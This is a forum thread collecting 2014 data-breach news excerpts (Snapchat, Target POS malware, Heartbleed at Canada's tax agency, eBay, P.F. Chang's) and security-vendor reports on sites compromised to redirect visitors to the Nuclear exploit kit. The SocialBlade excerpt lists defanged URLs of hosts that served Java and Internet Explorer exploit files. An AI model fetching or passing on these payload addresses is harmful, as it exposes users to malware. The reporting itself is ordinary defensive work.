View Full Version : Security breach/compromise - 2014

2014-01-02, 13:42

Snapchat leak - 4.6 million users ...
- http://bgr.com/2014/01/01/snapchat-leak-phone-numbers-usernames/
Jan 1, 2014 - "Snapchat users beware: someone has posted the phone numbers and usernames of more than 4.6 million accounts on the site SnapchatDB*, freely available as an SQL dump or CSV text file for anyone to download. The last two digits of each phone number have been censored “in order to minimize spam and abuse”... This giant leak comes just days after Gibson Security’s latest interview in which the company warns of Snapchat’s vulnerabilities. According to Gibson Security, the Snapchat team had taken far too long to address some very serious issues with the coding of the software, and had left the application wide open to exploits that could compromise user information... SnapchatDB claims that the database represents “a vast majority of the Snapchat users”... “This information was acquired through the recently patched Snapchat exploit and is being shared with the public to raise awareness on the issue,” says the owner of SnapchatDB. “The company was too reluctant at patching the exploit until they knew it was too late and companies that we trust with our information should be more careful when dealing with it.”
* UPDATE: SnapchatDB .info has been suspended and is no longer available.

- http://www.reuters.com/article/2013/12/31/us-apps-top-idUSBRE9BU0K820131231
Dec 31, 2013 - "Snapchat, Vine, and Candy Crush Saga earned coveted spots on smartphones this year, making them among the most downloaded apps of the year..."


2014-01-02, 13:59

Skype hacked to spread anti-MS messages
- http://www.theregister.co.uk/2014/01/02/skype_social_media_hacked_to_spread_antimicrosoft_messages/
2 Jan 2014 - "Entities claiming to represent the Syrian Electronic Army (SEA) have hacked Skype's social media presences and used them to post anti-Microsoft messages. Here's one of the defacements, from Skype's Twitter account.
- http://regmedia.co.uk/2014/01/02/skype_twitter_hack.png
... Skype's blog was also accessed and quickly became host to posts calling for Skype to stop allowing the NSA to access its back end... Skype wrestled control of its social media properties back from the alleged SEA members. The VoIP service has since posted the following all-clear to Twitter.
'You may have noticed our social media properties were targeted today. No user info was compromised. We’re sorry for the inconvenience. 8:13 PM - 1 Jan 2014'..."

- https://isc.sans.edu/diary.html?storyid=17330
Last Updated: 2014-01-01 23:00:26


2014-01-13, 13:24

Yahoo malware attack - greater than anticipated
- http://bgr.com/2014/01/13/yahoo-malware-attack/
Jan 13, 2014 - "The malware attack that took advantage of Yahoo’s Java-based ad network around Christmas Eve was far greater than anticipated, the company confirmed in a post*... on its help web pages. Initially believed to have affected only European users on January 3, 2014, the malware ad attacks were then said to have occurred during December 31, 2013 – January 3, 2014. But Yahoo on Friday revealed the attack actually took place between December 27, 2013 – January 3, 2014, and affected users -outside- of the European Union as well. It’s not clear how many users may have been affected by the hack..."
* http://help.yahoo.com/kb/index?locale=en_US&page=content&id=SLN22569
Jan 10th, 2014

:fear: :mad:

2014-01-17, 00:06

Security firm IDs malware used in Target attack
- http://www.computerworld.com/s/article/9245491/Security_firm_IDs_malware_used_in_Target_attack
Jan 16, 2014 - " A security company that worked with the U.S. Secret Service to investigate the data breach at Target identified the malware used in the attack as a sophisticated derivative of a previously known Trojan program designed to steal data from Point-of-Sale (POS) systems. In a report released Thursday, iSight Partners identified the tool as Trojan.POSRAM, which it described as software that can find, store and transmit credit card and PIN numbers from POS systems. The Trojan is being used in a "persistent, wide ranging, and sophisticated" cyber campaign dubbed KAPTOXA targeting "many operators" of POS systems, the company warned. Some affected companies may not yet know they've been compromised or have already lost data, the iSight report noted... the POSRAM Trojan as a customized version of BlackPOS*, a piece of malware that has been available in the cyber underground since at least last February. Like BlackPOS, the POSRAM Trojan is designed to steal a card's magnetic stripe data while it is stored momentarily in a POS system's memory, just after a credit or debit card is swiped at the terminal. After infecting a POS terminal, the malware monitors the memory address spaces on the device for specific information. When it finds something of interest, the software saves the data to a local file and then transfers it to the attackers at preset times. It then is coded to delete the local file to cover its tracks... At the time the code was discovered, even fully updated antivirus tools would not have been able to detect the malware..."
* http://www.symantec.com/connect/forums/dump-memory-grabber-blackpos

Malware Targeting Point of Sale Systems
- https://www.us-cert.gov/ncas/alerts/TA14-002A
Jan 2, 2014

- http://www.isightpartners.com/2014/01/kaptoxa-pos-report-faq/
Jan. 16, 2014

:fear::fear: :mad:

2014-01-31, 13:57

'ChewBacca' hacks targeted retailers in 11 countries: RSA
- http://www.reuters.com/article/2014/01/31/us-retailers-cyberattack-idUSBREA0T21120140131
Jan 31, 2014 - "A cyber criminal ring targeting small retailers in 11 countries stole data on 49,000 payment cards using a malicious software known as "ChewBacca" before the operation was shut down... RSA FirstWatch disclosed the attacks on Thursday on its website. It said the firm's researchers uncovered the ring, whose victims included small companies in the United States, Russia, Canada and Australia. They managed to steal details from some 24 million payment card transactions over about two months, according to RSA... The findings from RSA show that the recent spate of attacks extend outside the United States. "The end game is to gain credit card information, so the hackers are going to go wherever it is easiest to get that information," said Will Gragido, senior manager with RSA FirstWatch, the threat research arm of RSA Security. He said his firm provided the FBI with data on the "ChewBacca" operation, including the location of a command-and-control server used by the hackers on Wednesday. That server was shut down on Thursday, according to Gragido... RSA said the hackers used a relatively new piece of malicious software known as -ChewBacca- designed to infect computers such as the point-of-sales systems that process credit card transactions."

- https://blogs.rsa.com/rsa-uncovers-new-pos-malware-operation-stealing-payment-card-personal-information/
Jan 30, 2014

- https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware

Yahoo reports breach of some user accounts
- http://www.cnbc.com/id/101378748
30 Jan 2014 | 5:33 PM ET - "Yahoo reported on Thursday that some of its users' e-mail accounts may have been targeted in a security breach of a third-party database... The company notified users that may have been affected to reset their passwords. It has also implemented a second sign-in verification to allow users to re-secure their accounts..."

- http://www.reuters.com/article/2014/01/31/us-yahoo-hack-idUSBREA0T21H20140131
Jan 30, 2014

- https://isc.sans.edu/diary.html?storyid=17543
Last Updated: 2014-01-31 00:43:22 UTC

- http://yahoo.tumblr.com/post/75083532312/important-security-update-for-yahoo-mail-users

- https://help.yahoo.com/kb/SLN2080.html

Password Re-Use is the Problem...
- http://garwarner.blogspot.com/2014/01/yahoo-reveals-coordinated-attack-on.html
Jan 31, 2014


2014-02-19, 18:27

Over 1 Million Emails and Passwords Exposed ...
- https://www.trusteer.com/blog/the-sea-strikes-again-over-1-million-emails-and-passwords-exposed
Feb 19, 2014 - "The latest media outlet targeted by the Syrian Electronic Army (SEA) is Forbes .com. The hacktivist group was able to breach a database containing email address and password combinations for over a million user accounts, including Forbes contributors. Although the passwords were one-way encrypted, the media outlet recommended users change their passwords. To prove that it carried out the attack and breached the database, the SEA defaced three online articles. It seems that attackers and cybercriminals are increasingly targeting users’ login credentials, which will provide them access to various systems. Only two weeks ago we learned that Yahoo’s email system was breached using credentials stolen from a third party... With login credentials to the user’s account, it is possible to access information stored within the user's account. It is not known what type of information Forbes .com stored about its users. The concern would be exposure of personal and financial data. Credentials to contributors' accounts may actually provide access to systems used by the media outlet to publish news, allowing attackers to post fake news alerts... Users should change their login passwords and avoid reusing password across multiple websites and applications. Organizations should educate employees about the risk in re-using passwords for logging into multiple applications..."

- http://www.databreaches.net/syrian-electronic-army-hacks-forbes-steals-and-dumps-employee-and-user-data/
Feb 15, 2014

:mad: :fear:

2014-03-14, 12:20

Target failed to act on early alert ...
- http://www.reuters.com/article/2014/03/13/us-target-breach-idUSBREA2C14F20140313
Mar 13, 2014 - "Target Corp's security software detected potentially malicious activity during last year's massive data breach, but its staff decided -not- to take immediate action... The disclosure came after Bloomberg Businessweek* reported on Thursday that Target's security team in Bangalore had received alerts from a FireEye Inc security system on November 30 after the attack was launched and sent them to Target headquarters in Minneapolis... The FireEye reports indicated malicious software had appeared in the system... The alert from FireEye labeled the threat with the generic name "malware.binary"... experts said that they believed it was likely that Target's security team received hundreds of such alerts on a daily basis, which would have made it tough to have singled out that threat as being particularly malicious..."
* http://www.businessweek.com/articles/2014-03-13/target-missed-alarms-in-epic-hack-of-credit-card-data
Mar 13, 2014 - "... On Saturday, Nov. 30, the hackers had set their traps and had just one thing to do before starting the attack: plan the data’s escape route. As they uploaded exfiltration malware to move stolen credit card numbers — first to staging points spread around the U.S. to cover their tracks, then into their computers in Russia — FireEye spotted them. Bangalore got an alert and flagged the security team in Minneapolis. And then …
Nothing happened.
For some reason, Minneapolis didn’t react to the sirens. Bloomberg Businessweek spoke to more than 10 former Target employees familiar with the company’s data security operation, as well as eight people with specific knowledge of the hack and its aftermath, including former employees, security researchers, and law enforcement officials. The story they tell is of an alert system, installed to protect the bond between retailer and customer, that worked beautifully. But then, Target stood by as 40 million credit card numbers — and 70 million addresses, phone numbers, and other pieces of personal information — gushed out of its mainframes..."

:fear::fear: :sad:

2014-04-14, 16:20

Canada taxpayer data stolen in Heartbleed breach
- http://www.reuters.com/article/2014/04/14/us-canada-tax-heartbleed-idUSBREA3D0XZ20140414
Apr 14, 2014 - "Canada's tax-collection agency reported on Monday that the private information of some 900 people had been stolen from its computer systems as a result of vulnerabilities caused by the 'Heartbleed' bug. The breach allowed someone to extract social insurance numbers, which are used for employment and gaining access to government benefits, and possibly some other data, the Canada Revenue Agency said... Police are investigating and the country's privacy commissioner has been informed, it said. Right in the heart of tax-filing season, the CRA shut down access to its online services last Wednesday because of the bug, which is found in widely used Web encryption technology..."

Canadian charged in 'Heartbleed' attack on tax agency
- http://www.reuters.com/article/2014/04/16/us-cybersecurity-heartbleed-arrest-idUSBREA3F1KS20140416
Apr 16, 2014 - "Canadian police have arrested a 19-year-old man and charged him in connection with exploiting the "Heartbleed" bug to steal taxpayer data from a government website, the Royal Canadian Mounted Police (RCMP) said on Wednesday. In what appeared to be the first report of an attack using a flaw in software known as OpenSSL, the Canada Revenue Agency (CRA) said this week that about 900 social insurance numbers and possibly other data had been compromised as a result of an attack on its site. The suspect, Stephen Solis-Reyes, was arrested at his home in London, Ontario on Wednesday and faces criminal charges of unauthorized use of computer and mischief in relation to data... Police seized Solis-Reyes computer equipment and scheduled his court appearance for July 17, 2014..."

- https://blogs.akamai.com/2014/04/heartbleed-update-v3.html
April 13, 2014 7:20 PM - "Over the weekend, an independent security researcher contacted Akamai about some defects in the software we use for memory allocation around SSL keys. We discussed Friday how we believed this had provided our SSL keys with protection against Heartbleed and had contributed the code back to the community. The code that we had contributed back was, as we noted, not a full patch, but would be a starting point for improving the openssl codebase. In short: we had a bug. An RSA key has 6 critical values; our code would only attempt to protect 3 parts of the secret key, but does not protect 3 others. In particular, we only try to protect d, p, and q, but not d mod (p-1), d mod (q-1), or q^{-1} mod p. These intermediate extra values (the Chinese Remainder Theorem, or CRT, values) are calculated at key-generation time as a performance improvement. As the CRT values were not stored in the secure memory area, the possibility exists that these critical values for the SSL keys could have been exposed to an adversary exploiting the Heartbleed vulnerability. Given any CRT value, it is possible to calculate all 6 critical values. As a result, we have begun the process of rotating all customer SSL keys/certificates. Some of these certificates will quickly rotate; some require extra validation with the certificate authorities and may take longer. In parallel, we are evaluating the other claims made by the researcher, to understand what actions we can take to improve our customer protection."

- https://blogs.akamai.com/2014/04/heartbleed-a-history.html
April 16, 2014 - "In the interest of providing an update to the community on Akamai's work to address issues around the Heartbleed vulnerability, we've put together this outline as a brief summary:
• Akamai, like all users of OpenSSL, was vulnerable to Heartbleed.
• Akamai disabled TLS heartbeat functionality before the Heartbleed vulnerability was publicly disclosed.
• In addition, Akamai went on to evaluate whether Akamai's unique secure memory arena may have provided SSL key protection during the vulnerability window when we had been vulnerable; it would not have.
• Akamai is reissuing customer SSL certificates, due to the original Heartbleed vulnerability...
We are currently reviewing a revised version of our secure memory arena with some external researchers and developers. Once we are more confident that it more closely achieves its goals, we will contribute this code to the community. We also plan to evaluate how we can better collaborate and support the open source community."


2014-05-05, 14:52

Verizon 2014 Data Breach Investigations Report
- http://www.verizonenterprise.com/DBIR/
"The 2014 Data Breach Investigations Report (DBIR) casts new light on threats — taking 10 years of forensic data and finding that 92% of these can be categorized into nine basic attack patterns. This approach also helps identify primary threats to your industry, which you can analyze to reinforce your defenses."

- http://www.verizonenterprise.com/DBIR/2014/insider/

- http://www.verizonenterprise.com/resources/infographics/ig_Verizon-DBIR-2014_en_xg.pdf


2014-05-09, 19:09

Bitly: Regarding Your Account ...
- http://blog.bitly.com/post/85169217199/urgent-security-update-regarding-your-bitly-account
UPDATE #4 - MAY 11 at 11:33AM EDT: We are sending an email to all users from the domain bitlysupport .com outlining the steps to secure your account. If you have already followed the steps to secure your account, you do not need to do so again.
UPDATE #3 - MAY 9 at 2:45PM EDT: We have updated this post to address questions regarding the Bitly iPhone app.
UPDATE #2 - MAY 9 at 10:25AM EDT: "We have updated this post to explain what specifically was compromised and we’re encouraging all of our users to secure their Bitly accounts by following the recommendations listed below."
UPDATE #1 - MAY 8 at 8:32PM EDT: "We have updated the section of this post regarding users who have Twitter or Facebook accounts connected to their Bitly accounts.
We have reason to believe that Bitly account credentials have been compromised; specifically, users’ email addresses, encrypted passwords, API keys and OAuth tokens. We have no indication at this time that any accounts have been accessed without permission. We have taken steps to ensure the security of all accounts, including disconnecting all users’ Facebook and Twitter accounts..."

OAuth, OpenID Security Issues Could Leak Data, Redirect Users
- http://atlas.arbor.net/briefs/index#-527940361
Elevated Severity
9 May 2014

- http://www.databreaches.net/urgent-security-update-regarding-your-bitly-account/
May 8, 2014

:fear: :sad:

2014-05-21, 17:14

eBay to ask users to Change Passwords ...
- http://www.ebayinc.com/in_the_news/story/ebay-inc-ask-ebay-users-change-passwords
5.21.2014 - "eBay Inc. (Nasdaq: EBAY) said beginning later today it will be asking eBay users to change their passwords because of a cyberattack that compromised a database containing encrypted passwords and other non-financial data. After conducting extensive tests on its networks, the company said it has no evidence of the compromise resulting in unauthorized activity for eBay users, and no evidence of any unauthorized access to financial or credit card information, which is stored separately in encrypted formats. However, changing passwords is a best practice and will help enhance security for eBay users... Cyberattackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay's corporate network, the company said. Working with law enforcement and leading security experts, the company is aggressively investigating the matter and applying the best forensics tools and practices to protect customers.
The database, which was compromised between late February and early March, included eBay customers’ name, encrypted password, email address, physical address, phone number and date of birth. However, the database did not contain financial information or other confidential personal information. The company said that the compromised employee log-in credentials were first detected about two weeks ago. Extensive forensics subsequently identified the compromised eBay database, resulting in the company’s announcement today. The company said it has seen no indication of increased fraudulent account activity on eBay. The company also said it has no evidence of unauthorized access or compromises to personal or financial information for PayPal users. PayPal data is stored separately on a secure network, and all PayPal financial information is encrypted. Beginning later today, eBay users will be notified via email, site communications and other marketing channels to change their password. In addition to asking users to change their eBay password, the company said it also is encouraging any eBay user who utilized the same password on other sites to change those passwords, too. The same password should never be used across multiple sites or accounts..."

- http://atlas.arbor.net/briefs/
High Severity
May 29, 2014
Analysis: Attackers were able to access customers' names, email addresses, encrypted passwords, and more. Attackers stole employee credentials to access the corporate network, though eBay has not stated how that was accomplished.
Source: http://www.forbes.com/sites/jameslyne/2014/05/21/ebay-hacked-bleeds-data-why-you-need-to-act
Since confirmation of the data breach, another security flaw has been discovered in eBay's website: a XSS (cross-site scripting) vulnerability could be used to inject attack code and grab cookies from logged-in users.
Sources: https://cehsecurity.com/ebay-cross-site-scripting-xssxml-code/
- http://www.pcworld.com/article/2159400/ebay-flaw-could-be-used-to-hijack-accounts-researcher-says.html
eBay users should change their passwords immediately, as well as any websites where the password may have been reused. However, the same password should not be used across different sites, as ramifications of one site's compromise could affect other sensitive user accounts.


2014-05-27, 15:04

Avast takes down forums after breach hits 400,000 users
User names, email addresses and hashed passwords were compromised
- http://www.theinquirer.net/inquirer/news/2346752/avast-takes-down-forums-after-breach-hits-400-000-users
May 27 2014

- https://blog.avast.com/2014/05/26/avast-forum-offline-due-to-attack/
May 26, 2014 - "The AVAST forum is currently offline and will remain so for a brief period. It was hacked over this past weekend and user nicknames, user names, email addresses and hashed (one-way encrypted) passwords were compromised. Even though the passwords were hashed, it could be possible for a sophisticated thief to derive many of the passwords. If you use the same password and user names to log into any other sites, please change those passwords immediately. Once our forum is back online, all users will be required to set new passwords as the compromised passwords will no longer work... We are now rebuilding the forum and moving it to a different software platform. When it returns, it will be faster and more secure. This forum for many years has been hosted on a third-party software platform and how the attacker breached the forum is not yet known. However, we do believe that the attack just occurred and we detected it essentially immediately. We realize that it is serious to have these usernames stolen and regret the concern and inconvenience it causes you. However, this is an isolated third-party system and your sensitive data remains secure.
Vince Steckler
CEO AVAST Software"

- http://www.databreaches.net/avast-takes-community-forum-offline-after-data-breach/
May 26, 2014

Spotify - Important Notice to Our Users
- http://news.spotify.com/us/2014/05/27/important-notice-to-our-users/
May 27, 2014 Oskar Stål, CTO - "We’ve become aware of some -unauthorized- access to our systems and internal company data and we wanted to let you know the steps we’re taking in response. As soon as we were aware of this issue we immediately launched an investigation. Information security and data protection are of great importance to us at Spotify and that is why I’m posting today. Our evidence shows that only one Spotify user’s data has been accessed and this did not include any password, financial or payment information. We have contacted this one individual. Based on our findings, we are not aware of any increased risk to users as a result of this incident. We take these matters very seriously and as a general precaution will be asking certain Spotify users to re-enter their username and password to log in over the coming days. As an extra safety step, we are going to guide Android app users to upgrade over the next few days**. If Spotify prompts you for an upgrade, please follow the instructions. As always, Spotify does not recommend installing Android applications from anywhere other than Google Play, Amazon Appstore or https://m.spotify.com/. At this time there is no action recommended for iOS and Windows Phone users. Please note that offline playlists will have to be re-downloaded in the new version. We apologise for any inconvenience this causes, but hope you understand that this is a necessary precaution to safeguard the quality of our service and protect our users. We have taken steps to strengthen our security systems in general and help protect you and your data – and we will continue to do so. We will be taking further actions in the coming days to increase security for our users. Please click here* to read more."
* https://support.spotify.com/problems/#!/article/downloading-android-update

** https://play.google.com/store/apps/details?id=com.spotify.mobile.android.ui
May 28, 2014


2014-06-05, 13:44

SKorea databases hacked ...
- https://news.yahoo.com/us-general-says-skorea-databases-hacked-074734037.html
Jun 5, 2014 - "The top U.S. military official in South Korea said a hacking incident might have compromised the personal information of thousands of South Koreans employed by the American command. Gen. Curtis M. Scaparrotti, commander of U.S. Forces in South Korea, apologized Thursday for the "possible theft" from two databases of private details of South Koreans such as names, contact information and work history. About 16,000 current and former workers, almost all of them Korean nationals, and people who have sought jobs with the U.S. military in South Korea, are affected by the incident. The U.S. military said no classified military data was compromised as the databases were on a separate network. South Korean government, broadcasting and finance industry networks have been a frequent target of cyberattacks in the past. Some have been blamed on North Korea, which denies any involvement. Others have been attributed to hackers seeking to profit from data theft... U.S. Forces spokesman Christopher Bush said an investigation by the U.S. Army was underway to determine who was responsible. The U.S. has around 28,500 soldiers in South Korea as a deterrent against the North..."

- https://www.computerworld.com/s/article/9248887/U.S._Army_warns_of_database_breaches_in_South_Korea
June 6, 2014


2014-06-07, 01:57

Security incident on forum.eset.com
- https://forum.eset.com/topic/2590-security-incident-on-forumesetcom/
June 5, 2014 - "We have been informed by our third-party forum provider that user login details of ESET Security Forum members have been compromised. At this time we have confirmed that login data (user name/email and hashed forum passwords) have been accessed. We have requested details about the incident from our provider and have launched a full-scale investigation with them. ESET Security Forum has around 2,700 registered users and the only information stored are login details: no financial or other sensitive data are affected. ESET-operated infrastructure and ESET software users were not affected in any way by this incident. We recommend that all ESET Security Forum users change their passwords. Having different passwords for different services is a good practice: if you used your ESET Security Forum password for other services, we recommend that you also change those passwords immediately too... We apologize for any inconvenience.
ESET Security Forum"


2014-06-11, 00:35

Credit Card Breach at P.F. Chang
- http://krebsonsecurity.com/2014/06/banks-credit-card-breach-at-p-f-changs/
June 10, 2014 - "Nationwide chain P.F. Chang’s China Bistro said today that it is investigating claims of a data breach involving credit and debit card data reportedly stolen from restaurant locations nationwide. On June 9, thousands of newly-stolen credit and debit cards went up for sale on rescator[dot]so, an underground store best known for selling tens of millions of cards stolen in the Target breach. Several banks contacted by KrebsOnSecurity said they acquired from this new batch multiple cards that were previously issued to customers, and found that all had been used at P.F. Chang’s locations between the beginning of March 2014 and May 19, 2014... Contacted about the banks’ claims, the Scottsdale, Arizona-based restaurant chain said it has not yet been able to confirm a card breach, but that the company “has been in communications with law enforcement authorities and banks to investigate the source”... Banks contacted for this story reported cards apparently stolen from PFC locations in Florida, Maryland, New Jersey, Pennsylvania, Nevada and North Carolina. The new batch of stolen cards, dubbed “Ronald Reagan” by the card shop’s owner, is the first major glut of cards released for sale on the fraud shop since March 2014, when curators of the crime store advertised the sale of some 282,000 cards stolen from nationwide beauty store chain Sally Beauty. The items for sale are not cards, per se, but instead data copied from the magnetic stripe on the backs of credit cards. Armed with this information, thieves can re-encode the data onto new plastic and then use the counterfeit cards to buy high-priced items at big box stores, goods that can be quickly resold for cash (think iPads and gift cards, for example). The most common way that thieves steal this type of card data is by hacking into cash registers at retail locations and planting malicious software that surreptitiously records mag stripe data when cards are swiped through the machines. The breaches at Target, Neiman Marcus, Michaels and Sally Beauty all were powered by malware that thieves planted on point-of-sale systems..."

- http://pfchangs.com/security/
June 12, 2014 - "On Tuesday, June 10, P.F. Chang's learned of a security compromise that involves credit and debit card data reportedly stolen from some of our restaurants. Immediately, we initiated an investigation with the United States Secret Service and a team of third-party forensics experts to understand the nature and scope of the incident, and while the investigation is still ongoing, we have concluded that data has been compromised. At P.F. Chang's, the safety and security of our guests' payment information is a top priority. Therefore, we have moved to a manual credit card imprinting system for all P.F. Chang's China Bistro branded restaurants located in the continental United States. This ensures our guests can still use their credit and debit cards safely in our restaurants as our investigation continues. We have also established a dedicated public website, pfchangs.com/security, for guests to receive updates and answers to their questions. Because we are still in the preliminary stages of our investigation, we encourage our guests to be vigilant about checking their credit card and bank statements. Any suspected fraudulent activity should be immediately reported to their card company. We sincerely regret the inconvenience and concern this may cause for our guests."

:fear::fear: :mad:

2014-06-24, 03:30

AskMen site compromised to serve malicious code
- http://community.websense.com/blogs/securitylabs/archive/2014/06/23/the-official-website-of-askmen-is-compromised-to-serve-malicious-code.aspx
23 Jun 2014 - "... the official website of AskMen (at www .askmen .com ), a popular free online men's web portal, has been compromised and injected with malicious code that appears to be part of a mass-injection attack. According to similarweb.com, AskMen's website has more than 10 million visitors each month. The injected code redirects a user to a website serving exploit code, which subsequently drops malicious files on the victim's computer. Websense Security Labs has contacted the host master of askmen .com with a notification regarding the compromise. No response or acknowledgement has been received so far.
AskMen's main page as of 23 June 2014:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/0574.1.png
SimilarWeb .com statistics for AskMen:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/8233.askmen_5F00_similarweb_5F00_2.jpg
... Analysis: The injected code has been found in multiple locations within the main website as well as in localized versions of it, like au.askmen .com. When a user browses to the main website, the injected code loads automatically and silently redirects the user to a website serving the actual exploit code...
Java exploit:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/6746.8.png
Nuclear Pack Exploit Kit: The exploit page displays similar obfuscation techniques, which are often used in the Nuclear Pack exploit kit. In addition, the above mentioned Java exploit is most often used by Nuclear Pack. These facts strongly indicate that the attacker is using either the Nuclear Pack exploit kit or a variant of it...
Conclusion: ... even very popular websites are not immune to malicious code injection attacks. An attack of this scale can potentially infect tens of thousands of unsuspecting users due to the nature of the attack and the high popularity of the website."

- https://www.computerworld.com/s/article/9249318/AskMen.com_website_redirects_to_Caphaw_malware_WebSense_says
June 23, 2014 - "... The domains hosting the exploit code are constantly changing... The injected JavaScript code takes the current date and then uses an algorithm to hash that data, which generates a domain name where the hackers have hosted the exploit kit. A new attack domain is generated every day... the Nuclear Pack tries exploits for either outdated Java or Adobe Systems' Reader software... If the attack is successful, a malicious software called "Caphaw" is installed..."

- http://sitecheck.sucuri.net/results/askmen.com
Status: Site Potentially Harmful. Immediate Action is Required.
Web Trust: Blacklisted (9 Blacklists Checked) ...
IP address:
System Details:
Running on: Apache/2.2.21
System info: (Unix) PHP/5.3.19
Powered by: PHP/5.3.19
Outdated Web Server Apache Found: Apache/2.2.21...

- https://www.apache.org/dist/httpd/CHANGES_2.2.27
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0098 - 5.0
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6438 - 5.0


2014-06-25, 12:35

Montana state site hacked - over 1 million exposed
- http://www.dphhs.mt.gov/newsevents/newsreleases2014/june/identityprotection%20.shtml
June 24, 2014 - "State of Montana officials said today that 1.3 million people will be notified regarding the incident where hackers gained entry to a Department of Public Health and Human Services (DPHHS) computer server, though officials said there is no knowledge that information on the server was used inappropriately, or was even accessed. The state is notifying individuals whose personal information was on the server, consistent with state and federal laws. The notification list includes both current and former Montana residents, and in some instances, the estates of deceased individuals. Officials announced that the state is also notifying individuals of free credit monitoring and identity protection insurance... On May 22nd, an independent forensic investigation determined a DPHHS computer server had been hacked. The forensic investigation was ordered on May 15th when suspicious activity was first detected by DPHHS officials. When the suspicious activity was discovered, agency officials immediately shut down the server and contacted law enforcement... The state has taken several steps to further strengthen security, including safely restoring all systems affected, adding additional security software to better protect sensitive information on existing servers, and continually reviewing its security practices to ensure all appropriate measures are being taken to protect citizen information."

:fear::fear: :mad:

2014-07-19, 04:54

AskMen .com compromised again
- http://blog.malwarebytes.org/exploits-2/2014/07/askmen-com-compromised-again/
July 18, 2014 - "Last month, security firm Websense reported that popular website AskMen .com was compromised to serve malicious code. Today, our honeypot captured an attack coming from AskMen .com in what appears to have been malicious code injected in their server... an iframe (injection)... is what is used to do a -redirection- to a malicious site... a landing page for the Nuclear EK:
- Flash exploit: https://www.virustotal.com/en/file/97d7e3975fd7d0982c6d6092a3ca74cc9224369ffecff230c8eb02bb4a34d0fa/analysis/
- PDF exploit: https://www.virustotal.com/en/file/05efd8d19e9bcaf810171357024307a812ba6966464e3c5d3b54720900480646/analysis/1405699036/
- Java exploit: https://www.virustotal.com/en/file/0b1a173172a1fde75b5ed957667c3fdf3a168715c210895eed58e9c500573239/analysis/
Finally the following payload is dropped and executed:
- https://www.virustotal.com/en/file/d1c42ba5eb3dfe8ac861172b755e7779aa33811debfdccc6c2f16c956879955a/analysis/1405699015/
... Our free Malwarebytes Anti-Exploit* blocked this threat:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/07/blocked.png
We notified AskMen .com and they promptly replied that they were looking into the matter immediately..."
(More detail at the first malwarebytes URL of this post.)
* http://www.malwarebytes.org/antiexploit/


2014-07-24, 17:07

ECB says website hacked, no sensitive data affected
- http://www.reuters.com/article/2014/07/24/us-ecb-cybercrime-idUSKBN0FT1D620140724
July 24, 2014 - "The European Central Bank said on Thursday its website had been hacked and some email addresses and other contact information stolen but insisted no market-sensitive data were affected. The theft came to light after the central bank received an anonymous email on Monday night demanding money in exchange for the stolen addresses. The hackers broke into a database storing details of people who had registered for ECB conferences, visits and other events, the bank said. That database, which held about 20,000 email addresses and a much smaller number postal addresses and phone numbers, was kept physically separate from internal systems, it added. "No internal systems or market sensitive data were compromised," the ECB said in a statement. The ECB is currently running a particularly sensitive review of the euro zone's top lenders, collecting streams of data to gauge whether banks have valued loans and other assets correctly, before it starts supervising them. German police were investigating the breach and all people who might have had their details stolen had been contacted, said the bank."
- https://www.ecb.europa.eu/press/pr/date/2014/html/pr140724.en.html
24 July 2014

Philippine gov't site infected with Spam Code
- http://blog.malwarebytes.org/hacking-2/2014/07/philippine-government-site-infected-with-spam-code/
July 24, 2014 - "An online security repository of bad links [1] has recently flagged the official website of the Department of Agriculture* (Kagawaran ng Pagsasaka), which is owned and maintained by the Philippine government, as harbouring malware.
* http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/07/DA.png
We have determined that six pages, including the default page, have been injected with a Blackhat SEO spam code. Below is a list of other infected pages:
“Contact Us” page
“Advisory Banner” page
“About Us” page
Department Mission/Vision page
History of DA page
Below is a screenshot of the code we found:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/07/SEO-spam-code.png
... visiting the above infected pages will not get you infected; however, you will be contributing to the increase of the page rank of the gambling-related URL we can see in the code. We have reason to believe that the DA site has been hacked because of the presence of the injected code. Readers are advised to avoid accessing the website entirely until the administrators are able to remove the code and make sure that it’s safe to visit. Malwarebytes has already reported the infection to the DA."
1] https://www.virustotal.com/en-gb/url/17b18480bc1c1fbb154c43c36cba78c73f5e8c2cfd762eff214964055cbe4090/analysis/1406113101/


2014-07-29, 21:29

SocialBlade .com compromised - redirection chain to Nuclear Pack exploit kit
- http://blog.malwarebytes.org/exploits-2/2014/07/socialblade-com-compromised-starts-redirection-chain-to-nuclear-pack-exploit-kit/
July 29, 2014 - "... the YouTube stats tracker site SocialBlade .com is connected with malicious redirections that also lead to the Nuclear Pack EK.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/07/socialblade2.png
The drive-by download which was detected by our honeypots is successfully blocked by Malwarebytes Anti-Exploit. According to site tracker SimilarWeb, SocialBlade .com has a global rank of 5,791 and had around 3.6 million visits last month... Typically we’d see an iframe and we would be able to search for it by its string. This was not the case here, so we had to manually inspect each web session and external references. The intruder was in a core JavaScript file... the JavaScript code writes the iframe and launches the redirection workflow... Java exploit (CVE-2013-2465?):
hxxp ://50d88d1ad05y.correctzoom .uni.me/1406197380.jar
VT (4/52*)* https://www.virustotal.com/en/file/f0641b46121c7fa32e58904b4cc6a0b2c220253a61cf23a0aa26f26d045279e5/analysis/1406296526/
Internet Explorer exploit (CVE ?):
hxxp ://50d88d1ad05y.correctzoom .uni.me/1406197380.htm
VT (0/53**)
** https://www.virustotal.com/en/file/7f6906b5d52b4133b97e3ccb192ea0d46c3ef79b024bfd3ccaff9f0eed2ae651/analysis/
hxxp ://50d88d1ad05y.correctzoom .uni.me/f/1406197380/7
VT (17/52***)
*** https://www.virustotal.com/en/file/da3857d5496c3982222c330bd3d711bbe21d325da094050772b29838edf01e20/analysis/1406311279/
... most likely leads to ad-fraud related malware (clickjacking etc.). We have notified the owners of SocialBlade .com so they can fix the issue ASAP and prevent unnecessary malware infections..."

uni .me: https://www.virustotal.com/en-gb/ip-address/

- https://www.google.com/safebrowsing/diagnostic?site=AS:16276


